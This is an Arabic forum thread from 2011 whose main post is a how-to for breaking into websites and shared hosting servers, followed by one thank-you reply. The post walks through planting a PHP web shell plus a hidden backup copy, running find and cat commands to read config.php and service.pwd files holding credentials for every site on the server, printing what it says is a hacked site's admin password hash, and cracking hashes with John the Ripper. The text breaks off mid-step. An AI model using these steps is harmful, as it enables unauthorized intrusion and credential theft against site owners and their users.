إيجى تو داى

طريقة اختراق المواقع

اذهب الى الأسفل

طريقة اختراق المواقع

مُساهمة من طرف elmagic في الإثنين سبتمبر 05, 2011 12:19 pm

بسم الله الرحمن الرحيم

سيتضمن الكتاب بعض الدرووس المنقوله من بعض خبراء اختراق المواقع وشرح بعض الادوات المساعده للاختراق



الدرس الاول

طريقه اختراق السيرفر كاملا

للكاتب : الماجيك

===========================

طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي :alam 2:
لاخفاءه نسوي كذا بالطريقة هذي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] wget

وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---== --شرحالاوامر--==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وهذه ايضا اوامر مبسطة للافادة : : - -
+++++++++++++++++++++++++++++++++
A
access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
at : لتنفيذ امر في تاريخ ووقت معين
alarm : لعمل منبه
accept : لقبول اتصال على سوكيت .


B
batch : لتنفيذ امر عندما يحصل على تصريح
buildhash : مدقق املائي


C
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر


D
date : لاظهار التاريخ و الساعة
df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
diff : لمقارنه ملفين
diff3 : لمقارنه 3 ملفات او اكثر
dircmp : لمقارنه دليلان
du : تقرير عن مساحه القرض المستخدم


E
echo : يستخدم لاظهار سطر نكتب فيه تيكست
text editor : ed ( مثل الورد يعني )
egrep : مثل الامر grep
text editor : ex ( مثل الورد يعني )


F
file : للتقرير عن نوع ملف
find : للبحث عن ملفات
finger : تقرير عن مستخدم


G
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات


H
haltsys : لاغلاق النظام
head : لاظهار اول 10 اسطر من الملف


I
ispell : مدقق املائي


K
** kill : لانهاء عمليه


L
line : لقراءة ملف سطر معين في ملف
ln : لعمل لينك ملف معين
logname : للحصول على اسم الدخول الخاص بك
lpr : ارسال طلب للطباعه
lprint : للطباعه بالطابعه المحليه
lpstat : لتقديم تقرير عن حاله الطباعه
lpq : لتقديم تقرير عن حاله الطباعه
ls : لعرض محتويات مجلد


M
mail : لارسال و استقبال ايميلات
man : للحصول على معلومات عن اي امر
mkdir : لعمل دليل جديد
more : لعرض الملفات


P
passwd : لانشاء كملة سر او تغيره
pr : لطباعه ملف
ps : العمليات عن العمليات التي تم تشغيلها
pstat : لعرض حالة النظام
pwd : لعرض المسار الذي انت فيه الان


R
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
+++++++++++++++++++++++++++++++++++

جميع الحقوق محفوضه للكاتب دكتور الحب



================================================== =========================

اول درس في اختراق المواقع

للاستاذ الكبير سوبر كريستال

س1: ماهي الادوات التى تتيح لي الاختراق بسهوله ؟
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟
س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
س4: كيف اكتسب الثغره في صالحي في الاختراق؟
س5: بعد الحصول على الباسوورد مشفر ماذا افعل؟
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟
س7: كيف استطيع ان ادخل على سيرفر الاستضافة عن طريق الموقع المخترق؟
س8: اذا كان بالسيرفر سيف مود (الوضع الآمن) كيف أتخطاه ؟
===S===U===P==E===R===C===R===Y===S===T===A===L==
اولا
هذا ليس كل شئ في الاختراق وانما انا وضعت لكم رؤوس اقلام في مجال
الاختراق وعليك انت بنفسك تكملة المشوار و هذه الدروس يحتاج لها كل مبتدئ
باختراق المواقع وبعد ذالك يعتمد على نفسه .....

اولا الادوات التى تتيح لنا الاختراق وبمعنى اصح لن تستطيع ان تصبح هاكر وانت تعمل على مايكروزززززفت ويندوز
وانا انصحك قبل قرائتك الموضوع ان تذهب الى أقرب محل كمبيوتر وتشتري اسطوانات لينكس
وافضل انواع نظام اللينكس هو
المرتبة الاولى : المــاندريــك
المرتبة الثانية : الريد هات
المرتبة الثالثة : سوزي Suse
ويوجد عدة انواع ولكن انا بنفسي افضل السوزي ولكنه معقد بعض الشئ للمبتدئين

نظام لينكس يختلف عن الويندوز وشبية بنظام ليندوز
في نظام ويندوز يوجد الدوس bos وهو لتنفيذ الاوامر
وايضاء في نظام لينكس يوجد الشيل shell وهو ايضا لتنفيذ الاوامر مثل السكريبتات وترجمة لغة السي وغيرها.
يطلق على نظام لينكس المصدر المفتوح وهو قطعه مصغره من نظام يونيكس الذي يستخدم للسيرفرات وهو قوي جدا
تاريخ اصدار لينكس هو في عام 1991 وتم اصداره كبرنامج مجاني في عام 1992


ثاني اداة هي برنامج جون ذا ريبر وهذا البرنامج لكسر الباسووردات المشفره
وسوف اشرحه فيما بعد


====S==u==p==E==r===C==r==y==s==t==a===L======
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟

التعرف على نظام الموقع له عدة طرق فمنها
عن طريق التلينت..
التلينت هو نظام يوجد في الويندوز للاتصال بأجهزه بعيده
وطريقه تشغيله
اذهب الى
ابدا Start
تشغيل run
اكتب telnet
بعد ذلك إضغط على connectثم على Remote System بعد ذالك ستظهر لك شاشة صغيره
اكتب اسم الموقع بدون / او [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بجنب Host Name
Port سوف يظهر لك خمس خيارات من بينها telnet اختارها
Term Type اتركه كما هو
واضغط موافق ==>Enter

انتظر قليلا وسوف يستخرج التلينت لك معلومات عن الموقع مثل نظامه
اذا كان يونيكس او ويندوز 2000 اباتشي او غيره

ماذا
نستفيد من هذه المعلومات : الاستفاده هي اننا علمنا ان الموقع شغال على
نظام Linux Apache وقد استخدم تصميم الموقع على الفرونت بيج او غيره
ويوجد طريقه ثانيه واسهل
اذهب لموقع نت كرافت [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اكتب عنوان الموقع المراد اختراقه بدون http او / يعنى مثلا اننا نريد اختراق موقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


ونضغط على انتر او Lookup
بعد ذالك سوف يستخرج لك معلومات الموقع
-----------------------
Apache/1.3.29
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2
PHP/4.3.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.6b on
Linux-----------------------
يظهر لنا أن ملقم الويب هو
Apache
النسخة/الإصدارة
1.3.29
مع دعم الفرونت بيج FrontPage
طبعا ثغرات الفرونت بيج كثيره جدا

والثغرات
الآمنية هي اخطاء برمجية ومعروف ان شركه مايكروززززفت لاتخلوا من الاخطاء
لانها شركه فاشله جدا وكل ادواتها وبرامجها معرضة للاختراق


الآن عرفنا الدعم وهو فرونت بيج

نأتى للخطوة الثانيه

==B==L==A==C==K===3==S===F===H====C==O===M=====
- r E p u S
- C r y s t a l
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=

س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
الجواب في الخطوة الاولى تعرفنا على نظام الموقع وعرفنا ان الموقع يدعم الفرونت بيج مثلا
Ok الان اذهب لمواقع السكيورتى
او حمل أي برنامج ماسح لثغرات
مثل : Shadow Security Scanner
وانا اقول لك قبل استخدامك هذه البرنامج لاتعتمد عليه لانه سوف يستخرج لك 100000 ثغره و1 منها تفيدك و99999 لاتهم

طبعا برنامج الشادو سكان لن اشرحه هنا لانى شرحته قبل كذى في منتدى نجم دوس ## قسم الهاكرز العام ##

والان ابحث عن ثغرات الفرونت بيج عن طريق الشادو سكان او أي برنامج ماسح ثغرات او مواقع سكيورتى



%&%&%&%&%&%&%&%&%&%&%&%&%&%&%&%&

س4: كيف اكتسب الثغره في صالحي في الاختراق؟

الان اكتشفنا ثغره بالموقع
ولكن لن تفيدك اذا اضفتها للموقع هكذا ولكن يجب عليك ان تفعل مايجب فعله :
وهو ان تكون الاكسبلويت تنفيذي والحل هنا انك تنسخ الثغره وتضعها في الشيل
وسوف تكون تنفيذيه والان اكتب بعد عنوان الموقع واضافه الثغره /passwd.txt
وسوف يظهر لك اليوزرنيم والباسوود تبع الموقع مشفر هكذا xOi4i8U
وهذا موقع مخترقه انا
واعتبره فأر تجارب
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وهذا اليوزرنيم والباسوورد حق الموقع
WebAdmin:aepTOqxOi4i8U


الان ماذا تفعل حتى تكسر اليوزرنيم والباسوورد وتدخل على الموقع
=-=--S=-=-u=-=-p=-=-E=-=-r=-=-C=-=-r=-=-y=-=-s=-=-T=-=-a=-=L=-

الان استخدم اداة جون ذا ريبر في كسر الباسوورد
واذا كان لايتوفر لديك هذا البرنامج
اذهب الى محرك البحث GOOGLE
واكتبjohn-16 zip
بعد تحميل اداة جون وتثبيتها ونقلها لقرص السي
اذهب الى مجلد john-16 سوف يظهر لديك مجلدين واحد بأسمrun والثاني باسم doc
يهمنا هنا مجلد run ادخل عليه وضع الباسوورد واليوزرنيم المشفر
WebAdmin:aepTOqxOi4i8U
في المفكره واحفظها باسم passwd.txt او أي اسم وضعها في مجلد run

الآن اذهب الى
ابدا start
تشغيل run
اكتب command
سوف تظهر لديك شاشة الدوس
الان اكتب
cd john
واذا ظهر لديك في شاشة الدوس
avatar
elmagic

عدد المساهمات : 364
نقاط : 1147
السٌّمعَة : 167
تاريخ التسجيل : 14/07/2011
العمر : 23
الموقع : www.egy2day.3arabiyate.net
توقيت المنتدى :


معاينة صفحة البيانات الشخصي للعضو http://www.egy2day.3arabiyate.net

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: طريقة اختراق المواقع

مُساهمة من طرف bad_boy في الإثنين سبتمبر 26, 2011 11:40 am

مشكووووووووووورررررررررررر جدا
avatar
bad_boy

عدد المساهمات : 84
نقاط : 106
السٌّمعَة : 18
تاريخ التسجيل : 17/08/2011
العمر : 31
الموقع : http://egy2day.3arabiyate.net
توقيت المنتدى :


معاينة صفحة البيانات الشخصي للعضو http://egy2day.3arabiyate.net

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى